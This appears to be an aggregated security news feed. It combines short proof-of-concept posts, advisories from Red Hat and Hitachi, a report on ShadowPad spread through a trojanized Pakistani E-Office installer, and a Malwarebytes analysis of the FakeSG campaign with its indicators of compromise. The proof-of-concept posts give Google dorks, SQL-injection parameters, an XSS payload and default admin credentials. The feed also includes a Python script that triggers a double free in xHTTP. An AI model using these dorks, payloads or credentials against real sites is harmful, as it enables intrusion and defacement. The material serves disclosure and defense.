CCOM Events CMS version 0.1.02 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : CCOM Events CMS v0.1.02 Sql injecion Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://www.cyberunivers.com/                                                                                       |  | # Dork      : "details_news.php?id_news= "                                                                                       |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : details_news.php?id_news=[+]  http://127.0.0.1/samereorg/samere2/site/details_news.php?id_news=16 <==== inject here Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CCOM Events CMS 0.1.02 SQL Injection

Catpops Technobiz CMS version 4.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Catpops Technobiz CMS v4.0 XSS Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://catpops.in                                                                                                 |  | # Dork      : intext:''Designed By Catpops Technobiz''                                                                           |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /read_article_details.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E[+]  http://127.0.0.1/holyheartsin/read_article_details.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E[+]  http://127.0.0.1/holyheartsin/alumini.php?choice=success&value=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Catpops Technobiz CMS 4.0 Cross Site Scripting

Carbiz Buy Sell Car Marketplace Script version 1.2.0 appears to leave default credentials installed after installation.

    ======================================================================================================================================| # Title     : Carbiz - Buy Sell Car Marketplace Script V 1.2.0 Insecure Settings Vulnerability                                     || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit)                                              || # Vendor    : https://codecanyon.net/item/carbiz-buy-sell-car-marketplace-script/21803782                                          |  | # Dork      : "© Copyright 2018 Webhelios . All rights reserved"                                                                   |======================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  appears to leave default credentials installed after installation.[+]  Use Admin : admin & Pass : 12345[+]  Panel http://127.0.0.1/veloxcarsalescom/index.php/en/admin/authGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Carbiz Buy Sell Car Marketplace Script 1.2.0 Insecure Settings

Red Hat Security Advisory 2023-4025-01 - Red Hat OpenShift support for Windows Containers allows you to deploy Windows container workloads running on Windows Server containers. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Low: Red Hat OpenShift support for Windows Containers 7.1.0 [security update]  
Advisory ID:       RHSA-2023:4025-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4025  
Issue date:        2023-07-18  
CVE Names:         CVE-2022-36227 CVE-2023-0361 CVE-2023-25173   
                   CVE-2023-27535   
=====================================================================

1. Summary:

The components for Red Hat OpenShift support for Windows Containers 7.1.0  
are now available. This product release includes bug fixes and security  
updates for the following packages: windows-machine-config-operator and  
windows-machine-config-operator-bundle.

Red Hat Product Security has rated this update as having a security impact  
of Low. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift support for Windows Containers allows you to deploy  
Windows container workloads running on Windows Server containers.

Security Fix(es):

* containerd: Supplementary groups are not set up properly (CVE-2023-25173)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2174485 - CVE-2023-25173 containerd: Supplementary groups are not set up properly

5. JIRA issues fixed (https://issues.redhat.com/):

OCPBUGS-10417 - Case sensitivity issue when label "openshift.io/cluster-monitoring" set to 'True' on openshift-windows-machine-config-operator namespace  
OCPBUGS-10784 - In-tree storage for azure-file and vSphere is disabled  
OCPBUGS-10933 - BYOH upgrade failed Unable to cleanup the Windows instance: error running powershell.exe -NonInteractive -ExecutionPolicy Bypass \"C:\\k\\windows-instance-config-daemon.exe cleanup -  
OCPBUGS-10935 - Windows pods are unable to resolve DNS records for services  
OCPBUGS-11667 - BYOH node upgrade failed when the node not in default namespace: deleting node winhost\nF0402 08:53:43.066039    4740 cleanup.go:56] nodes \"winhost\" is forbidden: User \"system:serviceaccount:winc-namespace-test:windows-instance-config-daemon\"  
OCPBUGS-11785 - oc adm node-logs failing in vSphere CI  
OCPBUGS-13790 - Segmentation Violation found in WMCO .ensureWICDSecretContent  
OCPBUGS-14260 - Upgrade from WMCO 7.0.1 to 7.1.0 not working on Windows BYOH nodes: error waiting for proper windowsmachineconfig.openshift.io/version annotation for node  
OCPBUGS-14445 - Instance configurations fails on Windows Server 2019 without the container feature  
OCPBUGS-4862 - Deletion of BYOH Windows node hangs in Ready,SchedulingDisabled  
OCPBUGS-7336 - WMCO kubelet version not matching OCP payload's one  
OCPBUGS-7843 - containerd version is being misreported  
OCPBUGS-8037 - Directory deletion errors are being ignored when deconfiguring Windows instances  
OCPBUGS-8056 - WMCO is unable to drain DaemonSet workloads  
OCPBUGS-8085 - Hybrid Overlay logfile is in use and cannot be deleted  
WINC-1037 - Windows Server 2019 CI coverage  
WINC-981 - Red Hat OpenShift support for Windows Containers 7.0.1 Post Release  
WINC-983 - [e2e] Ensure required log files are non-empty

6. References:

https://access.redhat.com/security/cve/CVE-2022-36227  
https://access.redhat.com/security/cve/CVE-2023-0361  
https://access.redhat.com/security/cve/CVE-2023-25173  
https://access.redhat.com/security/cve/CVE-2023-27535  
https://access.redhat.com/security/updates/classification/#low

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkthd/AAoJENzjgjWX9erEn8MP/3Bf86MhhUzmDog2ttnikXx2  
KB8KBrmrYZIyuE59cbL1+8+kRTVxh3aW+Q9SHoiCY/ZlX3XvfeKJmzyOTCkdpyVO  
DasddWw2B3/NiRBH6ufpy4pJMva/4MCc2IH5VlDXXQy+ydrONIpw+Xa2pWqAzx47  
Sj30qqWmcgxev7KfZXPrC9gDj0pgl5CIsMzlDlhx2LvWmbaryXAL3zRB+AKKvrdA  
U3zIMRFOxRx/GJ3M9usWPkeGzgYVQHyljEIexKa6q8nW0ubyW3Gar2JD8CF8wwPM  
+pRJHJvoG4shcp9c6DkFGLt/Ti5/z+Vj3nSsIFbDzaT4LS7W5HzEdc7/C7PechWY  
gHesjgyqqX/nropT9mrwcTJt5boywdYcXPEkOxca5Ke+g2HMBrAR0F9SpnLjvWVE  
9qYfeeiUkrxb1TYV1iKe2qbkQvGcGSL9U9VYTgAisUXx4FLF6RW1+L57iZMYmTaC  
GXOF94oG2s7BBD4FteNAKIHNyIKIX/7CMMaQPZITTwxfxWDGlCup5OS2mBbdM4uO  
MAdket7e5FzfzNfJXbs0d2QTtyTqV1nXMyWZ4XVoinaoRgwHQb47xaMkGysF4GhL  
vpKTzH+nsX8nKq76m0GuQtHxqq9lVKCZ9m+l3WI7CzZf+mjLjbZ/TwMnFsFsiy3q  
MWCyyldecxHw+otiRbk/  
=4/Hi  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4025-01

Capitol Matrimonial Banquet Centre version 1.5 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Capitol Matrimonial Banquet Centre v1.5 Sql injection Vulnerability                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://www.capitolbanquet.com/                                                                                     |  | # Dork      : N/A                                                                                                                |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  Use Payload :/admin/settings.php?aid=[+]  http://127.0.0.1/capitolbanquetcom/admin/settings.php?aid=40660<=====| inject hereGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Capitol Matrimonial Banquet Centre 1.5 SQL Injection

An unidentified threat actor compromised an application used by multiple entities in Pakistan to deliver ShadowPad, a successor to the PlugX backdoor that's commonly associated with Chinese hacking crews.
Targets included a Pakistan government entity, a public sector bank, and a telecommunications provider, according to Trend Micro. The infections took place between mid-February 2022 and

An unidentified threat actor compromised an application used by multiple entities in Pakistan to deliver ShadowPad, a successor to the PlugX backdoor that's commonly associated with Chinese hacking crews.

Targets included a Pakistan government entity, a public sector bank, and a telecommunications provider, according to Trend Micro. The infections took place between mid-February 2022 and September 2022.

The cybersecurity company said the incident could be the result of a supply-chain attack, in which a legitimate piece of software used by targets of interest is trojanized to deploy malware capable of gathering sensitive information from compromised systems.

The attack chain takes the form of a malicious installer for E-Office, an application developed by the National Information Technology Board (NITB) of Pakistan to help government departments go paperless.

It's currently not clear how the backdoored E-Office installer was delivered to the targets. That said, there's no evidence to date that the build environment of the Pakistani government agency in question has been compromised.

This raises the possibility that the threat actor obtained the legitimate installer and tampered it to include malware, and then subsequently lured victims into running the trojanized version via social engineering attacks.

"Three files were added to the legitimate MSI installer: Telerik.Windows.Data.Validation.dll, mscoree.dll, and mscoree.dll.dat," Trend Micro researcher Daniel Lunghi said in an updated analysis published today.

Telerik.Windows.Data.Validation.dll is a valid applaunch.exe file signed by Microsoft, which is vulnerable to DLL side-loading and is used to sideload mscoree.dll that, in turn, loads mscoree.dll.dat, the ShadowPad payload.

Trend Micro said the obfuscation techniques used to conceal DLL and the decrypted final-stage malware are an evolution of an approach previously exposed by Positive Technologies in January 2021 in connection with a Chinese cyber espionage campaign undertaken by the Winnti group (aka APT41).

UPCOMING WEBINAR

Shield Against Insider Threats: Master SaaS Security Posture Management

Worried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.

Join Today

Besides ShadowPad, post-exploitation activities have entailed the use of Mimikatz to dump passwords and credentials from memory.

Attribution to a known threat actor has been hampered by a lack of evidence, although the cybersecurity company said it discovered malware samples such as Deed RAT, which has been attributed to the Space Pirates (or Webworm) threat actor.

"This whole campaign was the result of a very capable threat actor that managed to retrieve and modify the installer of a governmental application to compromise at least three sensitive targets," Lunghi said.

"The fact that the threat actor has access to a recent version of ShadowPad potentially links it to the nexus of Chinese threat actors, although we cannot point to a particular group with confidence."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Pakistani Entities Targeted in Sophisticated Attack Deploying ShadowPad Malware

Categories: Threat Intelligence
Tags: fakeupdates

Tags: socgholish

Tags: netsupport

Tags: RAT

A new campaign leveraging compromised WordPress sites emerges with another fake browser update.



(Read more...)




The post FakeSG enters the 'FakeUpdates' arena to deliver NetSupport RAT appeared first on Malwarebytes Labs.

Over 5 years ago, we began tracking a new campaign that we called FakeUpdates (also known as SocGholish) that used compromised websites to trick users into running a fake browser update. Instead, victims would end up infecting their computers with the NetSupport RAT, allowing threat actors to gain remote access and deliver additional payloads. As we have seen over the years, SocGholish is an established player that has managed to compromise countless victims and deliver ransomware after facilitating the installation of tools like Cobalt Strike or Mimikatz.

Now, there is a potential new competitor in the "fake updates" landscape that looks strangely familiar. The new campaign, which we call FakeSG, also relies on hacked WordPress websites to display a custom landing page mimicking the victim's browser. The threat actors are distributing NetSupport RAT either as a zipped download or via an Internet shortcut. While FakeSG appears to be a newcomer, it uses different layers of obfuscation and delivery techniques that make it a threat to take seriously and which could rival potentially rival with SocGholish.  

**Campaign similarities**

We first heard of this new campaign thanks to a Mastodon post by Randy McEoin. The tactics, techniques and procedures (TTPs) are very similar to those of SocGholish and it would be easy to think the two are related. In fact, this chain also leads to NetSupport RAT. However, the template source code is quite different and the payload delivery uses different infrastructure. As a result, we decided to call this variant FakeSG.

**Templates**

FakeSG has different browser templates depending on which browser the victim is running. The themed "updates" look very professional and are more up to date than its SocGholish counterpart.

**Website injections**

Compromised websites (WordPress appears to be the top target) are injected with a code snippet that replaces the current webpage with the aforementioned fake updates templates. The source code is loaded from one of several domains impersonating Google (google-analytiks\[.\]com) or Adobe (updateadobeflash\[.\]website):

That code contains all the web elements (images, fonts, text) needed to render the fake browser update page. We should note that SocGholish used to retrieve media files from separate web requests until more recently when it started using self-contained Base64 encoded images.

**Installation flow**

There are different installation flows for this campaign, but we will focus on the one that uses a URL shortcut. The decoy installer (_Install%20Updater%20(V104.25.151)-stable.url_) is an Internet shortcut downloaded from another compromised WordPress site.

This shorcut uses the WebDav HTTP protocol extension to retrieve the file _launcher-upd.hta_ from a remote server:

This heavily obfuscated script is responsible for the execution of PowerShell that downloads the final malware payload (NetSupport RAT).

Malwarebytes's EDR shows the full attack chain (please click to enlarge):

The NetSupport RAT files are hosted on the same compromised WordPress site used earlier to download the Internet shortcut. The RAT's main binary is launched from "_C:\\Users\\%username%\\AppData\\Roaming\\BranScale\\client32.exe_".

Following a successful infection, callbacks are made to the RAT's command and control server at 94.158.247\[.\]27.

**Roommates**

Fake browser updates are a very common decoy used by malware authors. In addition to SocGholish, the Domen toolkit was a well-built framework that emerged in 2019 while another campaign known as sczriptzzbn dropped SolarMarker leading to the NetSupport RAT in both cases. Initial access brokers use tools like NetSupport RAT to gather information and perform additional actions on victims of interest. Stolen credentials can be resold to other threat actors tied to ransomware gangs.

It is interesting to see another contender in this relatively small space. While there is a very large number of vulnerable websites, we already see some that have been injected with multiple different malicious code. From a visitor's point of view, this means there could be more than one redirect but the "winner" will be the one who is able to execute their malicious JavaScript code first.

We will continue to monitor these campaigns and in particular SocGholish to see if the web delivery landscape changes. Malwarebytes customers are protected as we detect the infrastructure and final payload used in these attacks.

**Indicators of Compromise (IOCs)**

**FakeSG infrastructure**

178.159.37\[.\]73  
google-analytiks\[.\]com  
googletagmanagar\[.\]com  
updateadobeflash\[.\]website

**WebDav launcher**

206\[.\]71\[.\]148\[.\]110  
206\[.\]71\[.\]148\[.\]110/Downloads/launcher-upd\[.\]hta

**NetSupport RAT**

pietrangelo\[.\]it/wp-content/uploads/2014/04/BranScale\[.\]zip  
pietrangelo\[.\]it/wp-content/uploads/2014/04/client32\[.\]exe

**NetSupport RAT C2**

94\[.\]158\[.\]247\[.\]27

**MITRE ATT&CK techniques**

   

**Tactic**

**ID**

**Name**

**Details**

Execution

T1059

Command and Scripting Interpreter

Powershell used to download payload

T1059.001

Powershell

Starts POWERSHELL.EXE for commands execution

T1059.003

Windows Command Shell

Starts CMD.EXE for commands execution

Privilege escalation

T1548

Abuse Elevation Control Mechanism

Encoded PowerShell

T1548.002

Bypass User Account Control

 

Defense evasion

T1564

Hide Artifacts

 Encoded PowerShell

T1218

System Binary Proxy Execution

 Drops CMSTP.inf in %temp%

T1027

Obfuscated Files or Information

 Drops th5epzxc.cmdline in %temp%

T1112

Modify Registry

Adds key to registry: HKEY\_CLASSES\_ROOT\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\shell\\open\\command /f /ve /t REG\_SZ /d C:\\Users\\admin\\AppData\\Roaming\\BranScale\\client32.exe

T1548

Abuse Elevation Control Mechanism

 

T1140

Deobfuscate/Decode Files or Information

 Encoded PowerShell

Discovery

T1082

System Information Discovery

Gets computer name

C&C

T1071

Application Layer Protocol

NetSupport RAT C2 communication

T1571

Non-Standard Port

Port destination: 5051

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

FakeSG enters the 'FakeUpdates' arena to deliver NetSupport RAT

Improper Validation of Certificate with Host Mismatch vulnerability in Hitachi Device Manager on Windows, Linux (Device Manager Server, Device Manager Agent, Host Data Collector components) allows Man in the Middle Attack.This issue affects Hitachi Device Manager: before 8.8.5-02.



*   Security Information ID
*   Vulnerability description
*   Affected products
*   Fixed products
*   Revision history

Update: July 18, 2023

Multiple vulnerabilities have been found in Hitachi Device Manager.

**Security Information ID**

hitachi-sec-2023-125

**Vulnerability description**

Hitachi Device Manager contain the following vulnerabilities:  

*   CVE-2023-34142: Cleartext Transmission Vulnerability in Hitachi Device Manager (Display new window)  
    CVSS SCORE: 9.0(Critical) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
*   CVE-2023-34143: Improper Validation of Certificate Vulnerability in Hitachi Device Manager (Display new window)  
    CVSS SCORE: 5.6(Mudium) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

Affected products and versions are listed below. Please upgrade your version to the appropriate version.

**Affected products**

The information is organized under the following headings:  

**(Example)  
Product name: Gives the name of the affected product.**

Version:

Platform

Gives the affected version.

**Product name: Hitachi Device Manager  
Component name: Device Manager Server  
**

Version(s):

Windows, Linux

less than 8.8.5-02

**Product name: Hitachi Device Manager  
Component name: Device Manager Agent  
**

Version(s):

Windows, Linux

less than 8.8.5-02

**Product name: Hitachi Device Manager  
Component name: Host Data Collector  
**

Version(s):

Windows, Linux

All versions

**General Precautions Regarding Vulnerabilities**

We do not plan to investigate or respond to storage management software vulnerabilities that arise from the management and monitoring of storage devices whose support period has ended.  
To prevent the impact of such latent vulnerabilities, remove storage devices whose support period has ended from the management and monitoring target of the storage management software.

**Fixed products**

The information is organized under the following headings:  

**(Example)  
Product name: Gives the name of the fixed product.**

Version:

Platform

Gives the fixed version, and release date.

Scheduled version:

Platform

Gives the fixed version scheduled to be released.

**Product name: Hitachi Device Manager(\*1)  
Component name: Device Manager Server  
**

Version(s):

Windows, Linux

8.8.5-02 July 10, 2023

**Product name: Hitachi Device Manager  
Component name: Device Manager Agent  
**

Version(s):

Windows, Linux

8.8.5-02 July 10, 2023

**Product name: Hitachi Device Manager  
Component name: Host Data Collector  
**

Contact your Hitachi support service representative.

\*1

Device Manager agent must also be upgraded.

For details on the fixed products, contact your Hitachi support service representative.

**Revision history**

July 18, 2023

This page is released.

*   Hitachi, Ltd. (hereinafter referred to as "Hitachi") tries to provide accurate information about security countermeasures. However, since information about security problems constantly changes, the contents of these Web pages are subject to change without prior notice. When referencing information, please confirm that you are referencing the latest information.
*   The Web pages include information about products that are developed by non-Hitachi software developers. Vulnerability information about those products is based on the information provided or disclosed by those developers. Although Hitachi is careful about the accuracy and completeness of this information, the contents of the Web pages may change depending on the changes made by the developers.
*   The Web pages are intended to provide vulnerability information only, and Hitachi shall not have any legal responsibility for the information contained in them. Hitachi shall not be liable for any consequences arising out of or in connection with the security countermeasures or other actions that you will take or have taken (or not taken) by yourself.
*   The links to other web sites are valid at the time of the release of the page. Although Hitachi makes an effort to maintain the links, Hitachi cannot guarantee their permanent availability.

CVE-2023-34143: hitachi-sec-2023-125: Multiple Vulnerabilities in Hitachi Device Manager

xHTTP 72f812d has a double free in close_connection in xhttp.c via a malformed HTTP request method.

Hi!

It appears that xHTTP contains a double free vulnerability in close\_connection at xhttp.c, line 595.

free(conn\->request.public.headers.list);

The double free can be triggered with a malformed HTTP request method. For example, the following python3 script will make a request to the server with a malformed HTTP request method to trigger the double free:

    #!/usr/bin/env python3
    
    import socket
    
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    
    sock.connect(('localhost', 8080))
    
    http_headers = (
        #Request - http_headers
        b'MALFORMEDMETHOD'*1000  +  # HTTP Method (POST Request).  Sending malformed HTTP Methods invokes a double free in xHTTP
        b' '  
        b'/'  
        b' HTTP/1.0'  
        b'\r\n' 
        b'Host: '  
        b'localhost'  
        b':'  
        b'8080'  
        b'\r\n'  
        b'Accept-Encoding: '  
        b'identity'  
        b'\r\n'  
        b'Content-Type: '  #Content type
        b'application/json'  #JSON content type
        b'\r\n'  
        
        b'Connection: close\r\n'  
        b'User-Agent: '  
        b'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246'  
        b'\r\n'  
    
        b'Content-Length: '  
        b'152'  #Size - Content-Length_size
        b'\r\n'  
        b'\r\n'  #Delim - crlf_headers_body
            #Block - post_body
            b'data=Somepostdata'  
    
    )
    
    sock.send(http_headers)
    sock.recv(65535)
    
    sock.close()
    

To confirm the issue, I first compiled the example server with debug symbols and address sanitizer:

    gcc example.c  xhttp.c -o main -fsanitize=address -g
    

Once the server was compiled, I executed the server on port 8080

**xHTTP Server**

After the server was up and running I saved the python3 script I created from above and executed it, triggering a double free.

**Python3 script****Address Sanitizer Output**

    =================================================================                       
    ==460363==ERROR: AddressSanitizer: attempting double-free on 0x611000000040 in thread T0:
        #0 0x7f7cfaab76a8 in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:52
        #1 0x562a5c0a1727 in close_connection /home/kali/projects/fuzzing/xHTTP/xhttp.c:595 
        #2 0x562a5c0a9406 in xhttp /home/kali/projects/fuzzing/xHTTP/xhttp.c:1749                                                                                                   
        #3 0x562a5c09f693 in main /home/kali/projects/fuzzing/xHTTP/example.c:37            
        #4 0x7f7cfa846189 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58            
        #5 0x7f7cfa846244 in __libc_start_main_impl ../csu/libc-start.c:381                 
        #6 0x562a5c09f420 in _start (/home/kali/projects/fuzzing/xHTTP/main+0x5420)         
                                                                                                                                                                                    
    0x611000000040 is located 0 bytes inside of 256-byte region [0x611000000040,0x611000000140)
    freed by thread T0 here:                                                                
        #0 0x7f7cfaab76a8 in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:52   
        #1 0x562a5c0a3a4b in parse /home/kali/projects/fuzzing/xHTTP/xhttp.c:868            
        #2 0x562a5c0a7371 in when_data_is_ready_to_be_read /home/kali/projects/fuzzing/xHTTP/xhttp.c:1459
        #3 0x562a5c0a92e0 in xhttp /home/kali/projects/fuzzing/xHTTP/xhttp.c:1735           
        #4 0x562a5c09f693 in main /home/kali/projects/fuzzing/xHTTP/example.c:37            
        #5 0x7f7cfa846189 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
                                                                                            
    previously allocated by thread T0 here:                                                                                                                                         
        #0 0x7f7cfaab78d5 in __interceptor_realloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:85
        #1 0x562a5c0a2dca in parse /home/kali/projects/fuzzing/xHTTP/xhttp.c:813            
        #2 0x562a5c0a7371 in when_data_is_ready_to_be_read /home/kali/projects/fuzzing/xHTTP/xhttp.c:1459
        #3 0x562a5c0a92e0 in xhttp /home/kali/projects/fuzzing/xHTTP/xhttp.c:1735
        #4 0x562a5c09f693 in main /home/kali/projects/fuzzing/xHTTP/example.c:37
        #5 0x7f7cfa846189 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    
    SUMMARY: AddressSanitizer: double-free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:52 in __interceptor_free
    
    

A possible fix could be implementing a check to ensure ' conn->request.public.headers.list ' is only freed once.

Thanks!

CVE-2023-38434: Double Free in Commit 72f812d · Issue #1 · cozis/xHTTP

Incorrect Default Permissions vulnerability in Hitachi Device Manager on Linux (Device Manager Server component), Hitachi Tiered Storage Manager on Linux, Hitachi Replication Manager on Linux, Hitachi Tuning Manager on Linux (Hitachi Tuning Manager server, Hitachi Tuning Manager - Agent for RAID, Hitachi Tuning Manager - Agent for NAS 

components), Hitachi Compute Systems Manager on Linux allows File Manipulation.This issue affects Hitachi Device Manager: before 8.8.5-02; Hitachi Tiered Storage Manager: before 8.8.5-02; Hitachi Replication Manager: before 8.8.5-02; Hitachi Tuning Manager: before 8.8.5-02; Hitachi Compute Systems Manager: before 8.8.3-08.



*   Security Information ID
*   Vulnerability description
*   Affected products
*   Fixed products
*   Revision history

Update: July 18, 2023

A File and Directory Permissions Vulnerability (CVE-2020-36695) exists in Hitachi Command Suite.

**Security Information ID**

hitachi-sec-2023-124

**Vulnerability description**

A File and Directory Permissions Vulnerability exists in Hitachi Command Suite.

*   CVE-2020-36695: File and Directory Permissions Vulnerability in Hitachi Command Suite (Display new window)  
    CVSS SCORE: 6.6(Medium) CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H

Affected products and versions are listed below. Please upgrade your version to the appropriate version.  

**Affected products**

The information is organized under the following headings:  

**(Example)  
Product name: Gives the name of the affected product.**

Version:

Platform

Gives the affected version.

**Product name: Hitachi Device Manager  
Component name: Device Manager server  
**

Version(s):

Linux

less than 8.8.5-02

**Product name: Hitachi Tiered Storage Manager  
**

Version(s):

Linux

less than 8.8.5-02

**Product name: Hitachi Replication Manager  
**

Version(s):

Linux

less than 8.8.5-02

**Product name: Hitachi Tuning Manager  
Component name: Hitachi Tuning Manager server  
**

Version(s):

Linux

less than 8.8.5-02

**Product name: Hitachi Tuning Manager  
Component name: Hitachi Tuning Manager - Agent for RAID  
**

Version(s):

Linux

less than 8.8.5-02

**Product name: Hitachi Tuning Manager  
Component name: Hitachi Tuning Manager - Agent for NAS  
**

Version(s):

Linux

less than 8.8.5-02

**Product name: Hitachi Compute Systems Manager  
**

Version(s):

Linux

less than 8.8.3-08

**General Precautions Regarding Vulnerabilities**

We do not plan to investigate or respond to storage management software vulnerabilities that arise from the management and monitoring of storage devices whose support period has ended.  
To prevent the impact of such latent vulnerabilities, remove storage devices whose support period has ended from the management and monitoring target of the storage management software.

**Fixed products**

The information is organized under the following headings:  

**(Example)  
Product name: Gives the name of the fixed product.**

Version:

Platform

Gives the fixed version, and release date.

Scheduled version:

Platform

Gives the fixed version scheduled to be released.

**Product name: Hitachi Device Manager  
**

Version(s):

Linux(\*1)

8.8.5-02 July 10, 2023

**Product name: Hitachi Tiered Storage Manager  
**

Version(s):

Linux(\*1)

8.8.5-02 July 10, 2023

**Product name: Hitachi Replication Manager  
**

Version(s):

Linux(\*1)

8.8.5-02 July 10, 2023

**Product name: Hitachi Tuning Manager(\*2)  
**

Version(s):

Linux(\*1)

8.8.5-02 July 10, 2023

**Product name: Hitachi Compute Systems Manager  
**

Version(s):

Linux

8.8.3-08 July 10, 2023

\*1

Solaris is no longer supported. Use the fixed version for Windows or Linux.

\*2

Hitachi Tuning Manager - Agent for RAID and Hitachi Tuning Manager - Agent for NAS must also be upgraded.

For details on the fixed products, contact your Hitachi support service representative.

**Revision history**

July 18, 2023

This page is released.

*   Hitachi, Ltd. (hereinafter referred to as "Hitachi") tries to provide accurate information about security countermeasures. However, since information about security problems constantly changes, the contents of these Web pages are subject to change without prior notice. When referencing information, please confirm that you are referencing the latest information.
*   The Web pages include information about products that are developed by non-Hitachi software developers. Vulnerability information about those products is based on the information provided or disclosed by those developers. Although Hitachi is careful about the accuracy and completeness of this information, the contents of the Web pages may change depending on the changes made by the developers.
*   The Web pages are intended to provide vulnerability information only, and Hitachi shall not have any legal responsibility for the information contained in them. Hitachi shall not be liable for any consequences arising out of or in connection with the security countermeasures or other actions that you will take or have taken (or not taken) by yourself.
*   The links to other web sites are valid at the time of the release of the page. Although Hitachi makes an effort to maintain the links, Hitachi cannot guarantee their permanent availability.

Tag

#windows